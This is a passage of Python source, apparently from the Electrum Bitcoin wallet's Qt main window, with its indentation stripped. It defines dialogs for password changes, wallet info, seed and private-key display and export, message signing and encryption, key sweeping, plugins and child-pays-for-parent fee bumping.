"Payments are more likely to succeed with a more complete graph."))
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
def change_password_dialog(self):
from electrum.storage import StorageEncryptionVersion
if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_storage=encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def init_lightning_dialog(self):
if self.question(_(
"Warning: this wallet type does not support channel recovery from seed. "
"You will need to backup your wallet everytime you create a new wallet. "
"Create lightning keys?")):
self.wallet.init_lightning()
self.show_message("Lightning keys created. Please restart Electrum")
def show_wallet_info(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(800, 100)
vbox = QVBoxLayout()
wallet_type = self.wallet.db.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
# lightning
grid.addWidget(QLabel(_('Lightning') + ':'), 5, 0)
from .util import IconLabel
if self.wallet.has_lightning():
if self.wallet.lnworker.has_deterministic_node_id():
grid.addWidget(QLabel(_('Enabled')), 5, 1)
else:
label = IconLabel(text='Enabled, non-recoverable channels')
label.setIcon(read_QIcon('warning.png'))
grid.addWidget(label, 5, 1)
if self.wallet.db.get('seed_type') == 'segwit':
msg = _("Your channels cannot be recovered from seed, because they were created with an old version of Electrum. "
"This means that you must save a backup of your wallet everytime you create a new channel.\n\n"
"If you want this wallet to have recoverable channels, you must close your existing channels and restore this wallet from seed")
else:
msg = _("Your channels cannot be recovered from seed. "
"This means that you must save a backup of your wallet everytime you create a new channel.\n\n"
"If you want to have recoverable channels, you must create a new wallet with an Electrum seed")
grid.addWidget(HelpButton(msg), 5, 3)
grid.addWidget(QLabel(_('Lightning Node ID:')), 7, 0)
# TODO: ButtonsLineEdit should have a addQrButton method
nodeid_text = self.wallet.lnworker.node_keypair.pubkey.hex()
nodeid_e = ButtonsLineEdit(nodeid_text)
qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
nodeid_e.addButton(qr_icon, lambda: self.show_qrcode(nodeid_text, _("Node ID")), _("Show QR Code"))
nodeid_e.addCopyButton(self.app)
nodeid_e.setReadOnly(True)
nodeid_e.setFont(QFont(MONOSPACE_FONT))
grid.addWidget(nodeid_e, 8, 0, 1, 4)
else:
if self.wallet.can_have_lightning():
grid.addWidget(QLabel('Not enabled'), 5, 1)
button = QPushButton(_("Enable"))
button.pressed.connect(self.init_lightning_dialog)
grid.addWidget(button, 5, 3)
else:
grid.addWidget(QLabel(_("Not available for this wallet.")), 5, 1)
grid.addWidget(HelpButton(_("Lightning is currently restricted to HD wallets with p2wpkh addresses.")), 5, 2)
vbox.addLayout(grid)
labels_clayout = None
if self.wallet.is_deterministic():
keystores = self.wallet.get_keystores()
ks_stack = QStackedWidget()
def select_ks(index):
ks_stack.setCurrentIndex(index)
# only show the combobox in case multiple accounts are available
if len(keystores) > 1:
def label(idx, ks):
if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
else:
return _("keystore") + f' {idx+1}'
labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
on_click = lambda clayout: select_ks(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Select keystore"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
for ks in keystores:
ks_w = QWidget()
ks_vbox = QVBoxLayout()
ks_vbox.setContentsMargins(0, 0, 0, 0)
ks_w.setLayout(ks_vbox)
mpk_text = ShowQRTextEdit(ks.get_master_public_key(), config=self.config)
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
run_hook('show_xpub_button', mpk_text, ks)
der_path_hbox = QHBoxLayout()
der_path_hbox.setContentsMargins(0, 0, 0, 0)
der_path_hbox.addWidget(QLabel(_("Derivation path") + ':'))
der_path_text = QLabel(ks.get_derivation_prefix() or _("unknown"))
der_path_text.setTextInteractionFlags(Qt.TextSelectableByMouse)
der_path_hbox.addWidget(der_path_text)
der_path_hbox.addStretch()
ks_vbox.addWidget(QLabel(_("Master Public Key")))
ks_vbox.addWidget(mpk_text)
ks_vbox.addLayout(der_path_hbox)
ks_stack.addWidget(ks_w)
select_ks(0)
vbox.addWidget(ks_stack)
vbox.addStretch(1)
btn_export_info = run_hook('wallet_info_buttons', self, dialog)
btn_close = CloseButton(dialog)
btns = Buttons(btn_export_info, btn_close)
vbox.addLayout(btns)
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase, config=self.config)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None, *,
help_text=None, show_copy_text_btn=False):
if not data:
return
d = QRDialog(
data=data,
parent=parent or self,
title=title,
help_text=help_text,
show_copy_text_btn=show_copy_text_btn,
config=self.config,
)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk, config=self.config)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, data: Union[str, bytes]) -> Union[None, 'PartialTransaction', 'Transaction']:
from electrum.transaction import tx_from_any
try:
return tx_from_any(data)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
return
def import_channel_backup(self, encrypted: str):
if not self.question('Import channel backup?'):
return
try:
self.wallet.lnworker.import_channel_backup(encrypted)
except Exception as e:
self.show_error("failed to import backup" + '\n' + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except UserFacingException as e:
self.show_error(e)
return
except BaseException as e:
self.logger.exception('camera error')
self.show_error(repr(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if data.lower().startswith(BITCOIN_BIP21_URI_SCHEME + ':'):
self.pay_to_URI(data)
return
if data.lower().startswith('channel_backup:'):
self.import_channel_backup(data)
return
# else if the user scanned an offline signed tx
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self) -> Optional[Transaction]:
fileName = getOpenFileName(
parent=self,
title=_("Select your transaction file"),
filter=TRANSACTION_FILE_EXTENSION_FILTER_ANY,
config=self.config,
)
if not fileName:
return
try:
with open(fileName, "rb") as f:
file_content = f.read() # type: Union[str, bytes]
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason),
title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(
parent=self,
title=_('Input raw transaction'),
header_layout=_("Transaction:"),
ok_label=_("Load transaction"),
config=self.config,
)
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_text_channel_backup(self):
text = text_dialog(
parent=self,
title=_('Input channel backup'),
header_layout=_("Channel Backup:"),
ok_label=_("Load backup"),
config=self.config,
)
if not text:
return
if text.startswith('channel_backup:'):
self.import_channel_backup(text)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
raw_tx = self._fetch_tx_from_network(txid)
if not raw_tx:
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
def _fetch_tx_from_network(self, txid: str) -> Optional[str]:
if not self.network:
self.show_message(_("You are offline."))
return
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except UntrustedServerReturnedError as e:
self.logger.info(f"Error getting transaction from network: {repr(e)}")
self.show_message(_("Error getting transaction from network") + ":\n" + e.get_message_for_gui())
return
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
return raw_tx
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join(map(lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
os.chmod(fileName, 0o600)
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), self.wallet.import_labels, on_import)
def do_export_labels(self):
export_meta_gui(self, _('labels'), self.wallet.export_labels)
def import_invoices(self):
import_meta_gui(self, _('invoices'), self.wallet.import_invoices, self.invoice_list.update)
def export_invoices(self):
export_meta_gui(self, _('invoices'), self.wallet.export_invoices)
def import_requests(self):
import_meta_gui(self, _('requests'), self.wallet.import_requests, self.request_list.update)
def export_requests(self):
export_meta_gui(self, _('requests'), self.wallet.export_requests)
def import_contacts(self):
import_meta_gui(self, _('contacts'), self.contacts.import_file, self.contact_list.update)
def export_contacts(self):
export_meta_gui(self, _('contacts'), self.contacts.export_file)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True, config=self.config)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address_for_corruption(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
privkeys = get_pk()
def on_success(result):
coins, keypairs = result
outputs = [PartialTxOutput.from_address_and_value(addr, value='!')]
self.warn_if_watching_only()
self.pay_onchain_dialog(coins, outputs, external_keypairs=keypairs)
def on_failure(exc_info):
self.on_error(exc_info)
msg = _('Preparing sweep transaction...')
task = lambda: self.network.run_from_another_thread(
sweep_preparations(privkeys, self.network))
WaitingDialog(self, msg, task, on_success, on_failure)
def _do_import(self, title, header_layout, func):
text = text_dialog(
parent=self,
title=title,
header_layout=header_layout,
ok_label=_('Import'),
allow_multi=True,
config=self.config,
)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
from .settings_dialog import SettingsDialog
d = SettingsDialog(self, self.config)
self.alias_received_signal.connect(d.set_alias_color)
d.exec_()
self.alias_received_signal.disconnect(d.set_alias_color)
if self.fx:
self.fx.trigger_update()
run_hook('close_settings_dialog')
if d.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
util.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.db.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.wallet.db.put("qt-console-history", self.console.history[-50:])
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p: Optional['BasePlugin'], name: str, i: int):
widget = settings_widgets.get(name) # type: Optional[QWidget]
if widget and not p:
# plugin got disabled, rm widget
grid.removeWidget(widget)
widget.setParent(None)
settings_widgets.pop(name)
elif widget is None and p and p.requires_settings() and p.is_enabled():
# plugin got enabled, add widget
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
# note: all enabled plugins will receive this hook:
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp_dialog(self, parent_tx: Transaction) -> None:
new_tx = self.wallet.cpfp(parent_tx, 0)
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_txid = parent_tx.txid()
assert parent_txid
parent_fee = self.wallet.get_tx_fee(parent_txid)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
fee_for_child = fee_e.get_amount()
if fee_for_child is None:
return
out_amt = max_fee - fee_for_child
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_for_child
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(fee_combo, 4, 2)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee is None:
return # fee left empty, treat is as "cancel"
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
try:
new_tx = self.wallet.cpfp(parent_tx, fee)
except CannotCPFP as e:
self.show_error(str(e))
return
self.show_transaction(new_tx)
def _add_info_to_tx_from_wallet_and_network(self, tx: PartialTransaction) -> bool:
"""Returns whether successful."""
# note side-effect: tx is being mutated
assert isinstance(tx, PartialTransaction)
try:
# note: this might download input utxos over network
